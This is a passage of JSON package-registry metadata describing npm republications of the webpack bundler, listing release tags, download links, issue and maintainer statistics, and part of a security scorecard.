cbd0d11ad8f592e2c70","kind":"commit","published_at":"2014-02-14T11:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"4f8ef991f1e7e5256fc061adbd8ba095c84c0d26","kind":"commit","published_at":"2014-02-14T09:07:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"820f304a9a77ae33bbe17d6eaac10595e5434543","kind":"commit","published_at":"2014-02-13T16:32:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"254c81c6afa7ac18030ab4bf3e37ab37ffbf1ea0","kind":"commit","published_at":"2014-02-13T10:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"78810b969193cf153b2f1c56c06d637f10afb6f4","kind":"commit","published_at":"2014-02-12T13:53:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"fa6f328f8210f28153d1cd86e1e7fa2da0e39d57","kind":"commit","published_at":"2014-02-12T08:00:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"7044c7a0f88a3f8645541330a9f235f66526b6ad","kind":"commit","published_at":"2014-02-11T12:30:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"6b7c23fb3181fa118a69ba3e320eb9ff57f249a4","kind":"commit","published_at":"2014-02-11T11:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"60684612b21b2f9481073fade5dbf0b0743fe833","kind":"commit","published_at":"2014-02-05T11:37:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"81d90ac4b8860ebb9ab3e5485a804becbd18c1ca","kind":"commit","published_at":"2014-02-05T11:05:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2/manifests"},{"name":"v1.0.0-rc1","sha":"5965a3a96a711629bcde184162c0f25f51da80dc","kind":"commit","published_at":"2014-02-03T17:21:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1/manifests"},{"name":"v1.0.0-beta9","sha":"0752c3bfff32b0a5beca6b8da5f6bd7eb34abd0e","kind":"commit","published_at":"2014-01-31T13:09:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9/manifests"},{"name":"v1.0.0-beta8","sha":"e58f315f321e6535a9ff34a8b87f949919dace01","kind":"commit","published_at":"2014-01-24T12:33:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8/manifests"},{"name":"v1.0.0-beta7","sha":"8be2e5a14ac873b703119362b5c3447eb8e5f60e","kind":"commit","published_at":"2014-01-21T15:25:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7/manifests"},{"name":"v1.0.0-beta6","sha":"a9fc61ff1a22091135f183809fb537a1325e532b","kind":"commit","published_at":"2014-01-10T09:49:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6/manifests"},{"name":"v1.0.0-beta5","sha":"cf45c9cd1cce6e3136894ace4f9ae8618d1211a1","kind":"commit","published_at":"2014-01-08T18:23:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5/manifests"},{"name":"v1.0.0-beta4","sha":"df0f3687db404a87eab75af62504828ce13dd03d","kind":"commit","published_at":"2013-12-29T11:21:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4/manifests"},{"name":"v1.0.0-beta3","sha":"a4c58898ff5395124ac8e2cf79c25095fbe8a98e","kind":"commit","published_at":"2013-12-29T11:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3/manifests"},{"name":"v1.0.0-beta2","sha":"f30bcfbd5793f9282d7dedb0ea0a20674f763fed","kind":"commit","published_at":"2013-12-19T22:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2/manifests"}]},"repo_metadata_updated_at":"2026-08-28T06:23:45.358Z","dependent_packages_count":0,"downloads":229,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":22.452676001702404,"dependent_packages_count":32.39659898394958,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":27.424637492825994},"purl":"pkg:npm/%40depup/webpack","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@depup/webpack","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@depup/webpack","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@depup/webpack/dependencies","status":null,"funding_links":["https://opencollective.com/webpack"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-28T00:11:08.805Z","issues_count":10164,"pull_requests_count":9440,"avg_time_to_close_issue":10849647.758436048,"avg_time_to_close_pull_request":2773483.7856259136,"issues_closed_count":9898,"pull_requests_closed_count":8891,"pull_request_authors_count":1445,"issue_authors_count":6685,"avg_comments_per_issue":5.83530106257379,"avg_comments_per_pull_request":3.1801906779661016,"merged_pull_requests_count":6026,"bot_issues_count":8,"bot_pull_requests_count":2913,"past_year_issues_count":80,"past_year_pull_requests_count":940,"past_year_avg_time_to_close_issue":868643.701754386,"past_year_avg_time_to_close_pull_request":363637.6099865047,"past_year_issues_closed_count":57,"past_year_pull_requests_closed_count":741,"past_year_pull_request_authors_count":79,"past_year_issue_authors_count":62,"past_year_avg_comments_per_issue":3.4375,"past_year_avg_comments_per_pull_request":4.864893617021276,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":140,"past_year_merged_pull_requests_count":586,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/issues","maintainers":[{"login":"sokra","count":1358,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sokra"},{"login":"alexander-akait","count":1081,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"vankop","count":196,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vankop"},{"login":"TheLarkInn","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheLarkInn"},{"login":"ooflorent","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ooflorent"},{"login":"hai-x","count":128,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":112,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"timse","count":100,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/timse"},{"login":"snitin315","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/snitin315"},{"login":"jhnns","count":78,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jhnns"},{"login":"xtuc","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xtuc"},{"login":"smelukov","count":52,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/smelukov"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"evenstensberg","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"chenxsan","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chenxsan"},{"login":"Legends","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Legends"},{"login":"Jessidhia","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Jessidhia"},{"login":"avivkeller","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"ScriptedAlchemy","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ScriptedAlchemy"},{"login":"jamesgeorge007","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jamesgeorge007"},{"login":"michael-ciniawsky","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/michael-ciniawsky"},{"login":"EugeneHlushko","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/EugeneHlushko"},{"login":"Connormiha","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Connormiha"},{"login":"hiroppy","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hiroppy"},{"login":"samccone","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/samccone"},{"login":"SpaceK33z","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/SpaceK33z"},{"login":"sendilkumarn","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sendilkumarn"},{"login":"mc-zone","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mc-zone"},{"login":"gajus","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gajus"},{"login":"ljqx","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljqx"},{"login":"byzyk","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/byzyk"},{"login":"gpoitch","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gpoitch"},{"login":"kentcdodds","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kentcdodds"},{"login":"nveenjain","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nveenjain"},{"login":"jbottigliero","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbottigliero"},{"login":"JounQin","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/JounQin"},{"login":"edmorley","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edmorley"},{"login":"pierreneter","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pierreneter"},{"login":"elliottsj","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/elliottsj"},{"login":"montogeek","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/montogeek"},{"login":"burhanuday","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/burhanuday"},{"login":"Janpot","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Janpot"},{"login":"shama","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shama"},{"login":"ovflowd","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"},{"login":"billyjanitsch","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/billyjanitsch"},{"login":"keblodev","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/keblodev"},{"login":"matheus1lva","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/matheus1lva"},{"login":"ljcrapo","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljcrapo"},{"login":"rishabh3112","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rishabh3112"},{"login":"anikethsaha","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anikethsaha"},{"login":"joshwiens","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/joshwiens"},{"login":"jeremenichelli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jeremenichelli"},{"login":"reergymerej","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/reergymerej"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"MrKou47","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/MrKou47"},{"login":"aboktor","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aboktor"},{"login":"mikegreiling","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mikegreiling"},{"login":"mattlewis92","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mattlewis92"},{"login":"eemeli","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/eemeli"},{"login":"pranshuchittora","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pranshuchittora"},{"login":"3ru","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/3ru"},{"login":"ryanclark","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ryanclark"},{"login":"sapegin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sapegin"},{"login":"loveky","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/loveky"},{"login":"edocipriano","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edocipriano"},{"login":"PatrickJS","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/PatrickJS"},{"login":"jevancc","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jevancc"},{"login":"chrisdothtml","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chrisdothtml"},{"login":"anshumanv","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anshumanv"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"}],"active_maintainers":[{"login":"alexander-akait","count":439,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"hai-x","count":87,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"avivkeller","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"evenstensberg","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"ovflowd","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@depup%2Fwebpack/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@depup%2Fwebpack/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@depup%2Fwebpack/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@depup%2Fwebpack/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@depup%2Fwebpack/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@depup%2Fwebpack/codemeta","maintainers":[{"uuid":"chiefmikey","login":"chiefmikey","name":null,"email":"wolfemikl@gmail.com","url":null,"packages_count":2144,"html_url":"https://www.npmjs.com/~chiefmikey","role":null,"created_at":"2026-03-14T21:10:25.847Z","updated_at":"2026-03-14T21:10:25.847Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/chiefmikey/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5816876,"maintainers_count":1245095,"namespaces_count":426640,"keywords_count":889778,"github":"npm","metadata":{"funded_packages_count":192526,"rate_limit":2},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-09-02T05:02:10.244Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":795166,"name":"@aleen42/webpack","ecosystem":"npm","description":"Packs CommonJs/AMD modules for the browser. Allows to split your codebase into multiple bundles, which can be loaded on demand. Support loaders to preprocess files, i.e. json, jsx, es7, css, less, ... and your custom stuff.","homepage":"https://github.com/webpack/webpack","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/webpack/webpack","keywords_array":[],"namespace":"aleen42","versions_count":1,"first_release_published_at":"2022-01-28T09:45:22.583Z","latest_release_published_at":"2022-01-28T09:45:22.583Z","latest_release_number":"5.67.0","last_synced_at":"2026-09-03T00:19:42.232Z","created_at":"2022-04-07T13:12:51.157Z","updated_at":"2026-09-03T00:19:42.232Z","registry_url":"https://www.npmjs.com/package/@aleen42/webpack","install_command":"npm install @aleen42/webpack","documentation_url":null,"metadata":{"funding":{"type":"opencollective","url":"https://opencollective.com/webpack"},"dist-tags":{"latest":"5.67.0"},"contentPolicy":null},"repo_metadata":{"id":2686067,"uuid":"3678731","full_name":"webpack/webpack","owner":"webpack","description":"A bundler for javascript and friends. Packs many modules into a few bundled assets. Code Splitting allows for loading parts of the application on demand. Through \"loaders\", modules can be CommonJs, AMD, ES6 modules, CSS, Images, JSON, Coffeescript, LESS, ... and your custom stuff.","archived":false,"fork":false,"pushed_at":"2026-08-22T00:09:57.000Z","size":95341,"stargazers_count":65973,"open_issues_count":138,"forks_count":9525,"subscribers_count":1466,"default_branch":"main","last_synced_at":"2026-08-22T13:33:37.681Z","etag":null,"topics":["amd","build-tool","commonjs","compiler","es2015","es6","esm","javascript","javascript-compiler","javascript-modules","loaders","module-bundler","plugins","web","web-performance","webpack"],"latest_commit_sha":null,"homepage":"https://webpack.js.org","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/webpack.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":"GOVERNANCE.md","roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":null,"disclosure":null},"funding":{"open_collective":"webpack"}},"created_at":"2012-03-10T10:08:14.000Z","updated_at":"2026-08-22T08:28:27.000Z","dependencies_parsed_at":"2026-08-08T12:34:57.314Z","dependency_job_id":null,"html_url":"https://github.com/webpack/webpack","commit_stats":{"total_commits":12493,"total_committers":934,"mean_commits":"13.375802997858672","dds":0.5586328343872569,"last_synced_commit":"89dfc9a5c575dc691e3ac6a965d39c854fca3986"},"previous_names":[],"tags_count":670,"template":false,"template_full_name":null,"purl":"pkg:github/webpack/webpack","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/sbom","scorecard":{"id":546233,"data":{"date":"2025-07-28","repo":{"name":"github.com/webpack/webpack","commit":"de79ee457eb921e6e1b186c90c65590789a013ca"},"scorecard":{"version":"v5.2.1-26-g4feedb85","commit":"4feedb857ab8d82158aa9774bf8054df41992180"},"score":6,"checks":[{"name":"Code-Review","score":5,"reason":"Found 12/24 approved changesets -- score normalized to 5","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#code-review"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#packaging"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 12 issue activity found in the last 